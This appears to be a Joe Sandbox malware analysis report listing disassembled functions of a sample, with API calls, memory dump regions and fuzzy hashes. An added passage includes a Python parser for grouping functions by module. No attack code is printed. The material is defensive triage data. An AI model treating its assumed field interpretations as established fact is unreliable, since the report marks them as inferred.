                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                  • String ID: A$C$E$G$I$K$L$M$W$Y$[$]$_
                                                                                                                  • API String ID: 2610073882-2890171266
                                                                                                                  • Opcode ID: 30e3f39d2b7907aa142a4f4320250002171428e40efd818ff74ff160ebeaf911
                                                                                                                  • Instruction ID: b6f7cae45f05b69b09684d1b5318f855af094a2e3f983b58365ef8f7b97a9cf3
                                                                                                                  • Opcode Fuzzy Hash: 30e3f39d2b7907aa142a4f4320250002171428e40efd818ff74ff160ebeaf911
                                                                                                                  • Instruction Fuzzy Hash: 6C31F66000CBD1CAD3229778944874FFFE15BA3324F084A9DE6E54B2D2D7AA8449C767
                                                                                                                  APIs
                                                                                                                  • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,00DA5D8D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00DA5E48
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00DA5F03
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00DA5F92
                                                                                                                  • __freea.LIBCMT ref: 00DA5FDD
                                                                                                                  • __freea.LIBCMT ref: 00DA5FE3
                                                                                                                  • __freea.LIBCMT ref: 00DA6019
                                                                                                                  • __freea.LIBCMT ref: 00DA601F
                                                                                                                  • __freea.LIBCMT ref: 00DA602F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 127012223-0
                                                                                                                  • Opcode ID: 026024d234df1f159c7e0eba083ad7085680d33cda558413e82676fe77ea7722
                                                                                                                  • Instruction ID: 94116349f33835ac8efebb53bf97aa351e812ae422b8ae87821aac27f75c9535
                                                                                                                  • Opcode Fuzzy Hash: 026024d234df1f159c7e0eba083ad7085680d33cda558413e82676fe77ea7722
                                                                                                                  • Instruction Fuzzy Hash: 8671E472904606AFDF21AE649C41FAF7BA9DF46310F2C005AFD54A7285EB35DE4087B1
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00D8BCAC
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D8BCD8
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00D8BD17
                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D8BD34
                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D8BD73
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D8BD90
                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D8BDD2
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D8BDF5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2040435927-0
                                                                                                                  • Opcode ID: 7e034050cfe6c71bcb68ebe111d8e72beb2eb1ea51aadd3c36b75217238c294a
                                                                                                                  • Instruction ID: 4244f9e138224a7785dc4f17ce47585284e1022e24fd95451c5802de54d36dbe
                                                                                                                  • Opcode Fuzzy Hash: 7e034050cfe6c71bcb68ebe111d8e72beb2eb1ea51aadd3c36b75217238c294a
                                                                                                                  • Instruction Fuzzy Hash: 2A518E72600206FFEF216F61CC45FAB7BA9EB44760F29412AFA15E6190DB34DD118BB0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3213747228-0
                                                                                                                  • Opcode ID: 2c47a9589d857942ba6db73439f18bf632ce85774986f6ba8f5dc3e95f03e122
                                                                                                                  • Instruction ID: fd437cda39d1fbcfdcdadfb376c9d5b68b520caf9c4d8970326f8ac2a40bac8f
                                                                                                                  • Opcode Fuzzy Hash: 2c47a9589d857942ba6db73439f18bf632ce85774986f6ba8f5dc3e95f03e122
                                                                                                                  • Instruction Fuzzy Hash: 4DB10473A002659FDF118F6CCC82BAEBBA5EF55350F198155E948AB282D274D901C7F2
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D8CBD7
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D8CBDF
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D8CC68
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D8CC93
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D8CCE8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                  • Opcode ID: c70920877381f4d31fb31f1a2c45b297b32ec6d79a606fa55353b2420f8ca142
                                                                                                                  • Instruction ID: af0a66af44b1706bacb058701c8f7702600fa734a9b50d2388e8e532ab84b1cf
                                                                                                                  • Opcode Fuzzy Hash: c70920877381f4d31fb31f1a2c45b297b32ec6d79a606fa55353b2420f8ca142
                                                                                                                  • Instruction Fuzzy Hash: 6E41E334A20218EFCF10EF68C885A9EBBB1EF45314F188155E8199B362D731EE15CBB5
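The blocks above are the per-function metadata Joe Sandbox emits for each disassembled function: the API calls it references, the memory dump it was recovered from, and the IDs and fuzzy hashes used for similarity matching. As an added example (not part of this report and not Joe Sandbox's own tooling), the Python below parses that format into records and groups functions by the module they were recovered from, which separates the CRT functions in the loaded image at 0xD80000 (GetCPInfo, _ValidateLocalCookies and friends) from the functions in the 0x400000 dump that reference no API name at all. The reading of the dotted fields in the .sdmp name (region base, page protection, memory type) is an assumption inferred from the names on this page, not documented Joe Sandbox behaviour, and the sample input is constructed from three trimmed blocks of this listing.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: three function blocks copied from this report's listing,
# trimmed to the fields the parser needs. The "Download File" suffix is the
# page's link residue and is stripped by the parser.
SAMPLE_LISTING = """\
APIs
• GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,00DA5D8D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00DA5E48
• __alloca_probe_16.LIBCMT ref: 00DA5F03
Memory Dump Source
• Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: __freea$__alloca_probe_16$Info
• String ID:
• API String ID: 127012223-0
• Instruction Fuzzy Hash: 8671E472904606AFDF21AE649C41FAF7BA9DF46310F2C005AFD54A7285EB35DE4087B1
APIs
• _ValidateLocalCookies.LIBCMT ref: 00D8CBD7
Strings
Memory Dump Source
• Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Instruction Fuzzy Hash: 6E41E334A20218EFCF10EF68C885A9EBBB1EF45314F188155E8199B362D731EE15CBB5
Memory Dump Source
• Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Instruction Fuzzy Hash: 1BC02B2871C50087C70CCF10EC00035B276F78B204F50712AC0032361FC0E0C402460C
"""

# Assumed dump-name layout (inferred from the names on this page, not documented):
# 4th dotted field = region base, 5th = page protection, 7th = memory type.
SDMP_RE = re.compile(r"\d{8}\.\d{8}\.\d+\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})"
                     r"\.[0-9A-Fa-f]{8}\.([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp")
OFFSET_RE = re.compile(r"Offset: ([0-9A-Fa-f]+)")
# "Name.MODULE(args), ref: addr" or "Name.MODULE ref: addr"
API_RE = re.compile(r"^([\w@?$]+)\.(\w+)(?:\((.*)\))?,? ref: ([0-9A-Fa-f]+)$")
PROTECT = {0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x1000000: "MEM_IMAGE"}


@dataclass
class FunctionRecord:
    module_base: int = 0          # the "Offset:" value, i.e. the module the function sits in
    protect: int = 0              # assumed page-protection field of the dump name
    mem_type: int = 0             # assumed memory-type field of the dump name
    api_calls: list = field(default_factory=list)   # (api, module, ref address)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)      # "API ID", "String ID", ...


def parse_listing(text):
    """One FunctionRecord per block; '• Instruction Fuzzy Hash' closes a block."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip().replace("Download File", "")   # strip page link residue
        if line in ("APIs", "Strings"):
            section = line
            continue
        if not line.startswith("• "):     # "Memory Dump Source", "Similarity", blank
            section = None
            continue
        body = line[2:]
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                cur.api_calls.append((m.group(1), m.group(2), int(m.group(4), 16)))
            continue
        if section == "Strings":
            cur.strings.append(body)
            continue
        key, _, value = body.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":
            m, o = SDMP_RE.search(value), OFFSET_RE.search(value)
            if m and o:
                cur.protect, cur.mem_type = int(m.group(2), 16), int(m.group(3), 16)
                cur.module_base = int(o.group(1), 16)
        elif key != "Associated":
            cur.fields[key] = value
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    return records


def summarize(records):
    """Per module: function count and how many reference a resolved API name."""
    out = {}
    for r in records:
        key = (r.module_base, PROTECT.get(r.protect, hex(r.protect)),
               MEM_TYPE.get(r.mem_type, hex(r.mem_type)))
        entry = out.setdefault(key, {"functions": 0, "with_api_ids": 0})
        entry["functions"] += 1
        if r.fields.get("API ID"):
            entry["with_api_ids"] += 1
    return out


if __name__ == "__main__":
    for key, counts in summarize(parse_listing(SAMPLE_LISTING)).items():
        print(f"module 0x{key[0]:X} {key[1]} {key[2]}: {counts}")
```

Functions with an empty API ID in an executable, writable private region are the ones where the static import view is blind, since names resolved at runtime never appear in this field; for those, the Opcode and Instruction fuzzy hashes under "Similarity" are the pivot for matching the function across samples, and this is why the summary counts them separately.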
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,00D98471,00D821C2,?,00000000,?), ref: 00D98423
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                  • Opcode ID: da0c58385fdda4a67463141e9f7083aeb518aed811c8580e53b9e602badc82ae
                                                                                                                  • Instruction ID: bacdf6155509dc8be18f8ee99360d623ce22004bd56c8a94474ecdc33e326e93
                                                                                                                  • Opcode Fuzzy Hash: da0c58385fdda4a67463141e9f7083aeb518aed811c8580e53b9e602badc82ae
                                                                                                                  • Instruction Fuzzy Hash: 6421C331A01315EBDF219B65EC44A5F3B59AF46BA0F290221E951E7391DB30ED01D6F0
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D8BEE2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00D8BEF0
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00D8BF01
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                  • API String ID: 667068680-1047828073
                                                                                                                  • Opcode ID: 9a1c216be92cfcee9da137fe35af252484d8db07521685a09b155faafa28ffb2
                                                                                                                  • Instruction ID: 19d8e03ab6a69d5fd0a37f06f6cb00b76ab536f4c2ccc15aec5c1cad734ee3eb
                                                                                                                  • Opcode Fuzzy Hash: 9a1c216be92cfcee9da137fe35af252484d8db07521685a09b155faafa28ffb2
                                                                                                                  • Instruction Fuzzy Hash: 6FD09E79656354EF97005B707C098973FA5DA467513068257F411D3361E6B455048F71
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e1d81ce45b5f3bb0ab33a316def5734c136123acda92a7f322284306a11e0b9d
                                                                                                                  • Instruction ID: 9fde8fe4765b691de3f7480fb4ae948adc3b830f939116c0148592ad12856904
                                                                                                                  • Opcode Fuzzy Hash: e1d81ce45b5f3bb0ab33a316def5734c136123acda92a7f322284306a11e0b9d
                                                                                                                  • Instruction Fuzzy Hash: CCB1BF70A04349EFDF11DFA8C881BAE7FB1EF46310F184258E955A7292C7709942CBB4
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00D96109,00D8C977,00D8B7A5), ref: 00D96120
                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D9612E
                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D96147
                                                                                                                  • SetLastError.KERNEL32(00000000,00D96109,00D8C977,00D8B7A5), ref: 00D96199
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3852720340-0
                                                                                                                  • Opcode ID: 5a999d2ea94dec3626516ca7145e7216e99a2da7509d7faf8665fe5416b0f80a
                                                                                                                  • Instruction ID: 16bc964f738a95ecc7bb5bb947a7a3ceec3d2c6342a0ab1991cfdfcf6ed449d1
                                                                                                                  • Opcode Fuzzy Hash: 5a999d2ea94dec3626516ca7145e7216e99a2da7509d7faf8665fe5416b0f80a
                                                                                                                  • Instruction Fuzzy Hash: 8E01F737259711DEAF352BB47C859672AA5EB263B5724032AF525B12F2FF118C0193B0
                                                                                                                  APIs
                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00D96AF9
                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00D96D72
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                                  • String ID: csm$csm$csm
                                                                                                                  • API String ID: 2673424686-393685449
                                                                                                                  • Opcode ID: 38b46d1a1acc5d876f15c95fda3bc4e26f1a00a3478de9d38d645bc8d06a3da5
                                                                                                                  • Instruction ID: f956a5fab7dc8a88a64835b240b149a3b43fff6b8648a60a86929b176905b27c
                                                                                                                  • Opcode Fuzzy Hash: 38b46d1a1acc5d876f15c95fda3bc4e26f1a00a3478de9d38d645bc8d06a3da5
                                                                                                                  • Instruction Fuzzy Hash: A8B158B1900209EFCF29DFA4C9819AEBBB5FF14314F18415AF815AB212D731EA51CBB1
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassHandleMessageModuleRegister
                                                                                                                  • String ID: ($Melon
                                                                                                                  • API String ID: 1585107554-1480228127
                                                                                                                  • Opcode ID: 5c5a3cdfbb4f6886e64de4527dd19e818f089e5f6e6114349e5d41dd9d58ffc4
                                                                                                                  • Instruction ID: 5d2e06aff7418538b31cabcf21c2b7033203aba761094ced71b8820f7877d8c0
                                                                                                                  • Opcode Fuzzy Hash: 5c5a3cdfbb4f6886e64de4527dd19e818f089e5f6e6114349e5d41dd9d58ffc4
                                                                                                                  • Instruction Fuzzy Hash: 5021B6B0905308DFDB44EFA8E58979EBBF0FB48300F50892AE44AD7354E77499489F66
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00DA7345,000000FF,?,00D9145E,00D91345,?,00D914FA,00000000), ref: 00D913D2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D913E4
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00DA7345,000000FF,?,00D9145E,00D91345,?,00D914FA,00000000), ref: 00D91406
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                  • Opcode ID: 0a094d671be87879b81e197280ddcf4fc8ec8b8b0401ae4f45415b3cc1bf3884
                                                                                                                  • Instruction ID: d256b81d1e4b8afddf0bfd19b2d51447c9fc1503f627552f2d7acdb6e67df790
                                                                                                                  • Opcode Fuzzy Hash: 0a094d671be87879b81e197280ddcf4fc8ec8b8b0401ae4f45415b3cc1bf3884
                                                                                                                  • Instruction Fuzzy Hash: D0016735A4461AEFDF159F54CC09FAFBBB8FB44B11F044629E821E2790DB749900CA60
                                                                                                                  APIs
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D98BBB
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D98C84
                                                                                                                  • __freea.LIBCMT ref: 00D98CEB
                                                                                                                    • Part of subcall function 00D97381: HeapAlloc.KERNEL32(00000000,?,?,?,00D88E50,?,?,00D821C2,00001000,?,00D8210A), ref: 00D973B3
                                                                                                                  • __freea.LIBCMT ref: 00D98CFE
                                                                                                                  • __freea.LIBCMT ref: 00D98D0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
